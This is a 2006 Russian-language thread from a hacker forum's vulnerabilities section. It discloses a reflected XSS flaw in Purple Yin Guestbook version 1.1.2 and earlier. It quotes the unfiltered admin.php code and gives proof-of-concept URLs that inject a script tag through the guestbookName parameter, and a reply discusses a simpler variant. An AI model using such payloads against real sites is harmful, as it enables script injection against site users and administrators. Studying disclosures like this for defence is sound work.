Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Пассивные XSS в Purple Yin Guestbook Version <=1.1.2 (https://forum.antichat.xyz/showthread.php?t=24330)

1ten0.0net1 23.09.2006 02:25

Пассивные XSS в Purple Yin Guestbook Version <=1.1.2
 
Из-за отсутствия фильтрации большинтсва параметров в скрипте admin.php становится возможной реализация XSS нападения.

Пример бажного кода admin.php:

$guestbookName=GUESTBOOK_NAME;
.....
<td></td><td><a href="http://purpleyin.com"><p style="font-weight:bold;color:#FFFFFF;">$guestbookName</p></a></td>

Значение константы GUESTBOOK_NAME присваивается переменной $guestbookNamе, при этом сама константа не определена.


Proof of concept:

http://site.com/guestbook/admin.php?guestbookName="><script>alert(/XSS/)</script>

Кроме этого уязвимы почти все остальные параметры данного скрипта. Видимо, создатели посчитали, что скрипт admin.php будет просматривать только админ.

P. S. Работает в Internet Explorer

[hidden] 23.09.2006 08:40

Может, я чего-то не догоняю, но если заходить по адресу

http://site.com/guestbook/admin.php?guestbookName="><script>alert(/XSS/)</script>

то это преобразуется в

<td></td><td><a href="http://purpleyin.com"><p style="font-weight:bold;color:#FFFFFF;">"><script>alert(/XSS/)</script></p></a></td>

Может, можно обойтись

http://site.com/guestbook/admin.php?guestbookName=<script>alert(/XSS/)</script> ?

Сорри, если чего недопонял, и просьба хотя бы ткнуть носом в то место, которое я не понял..

KPOT_f!nd 24.09.2006 02:08

Пригодиться!


Время: 06:49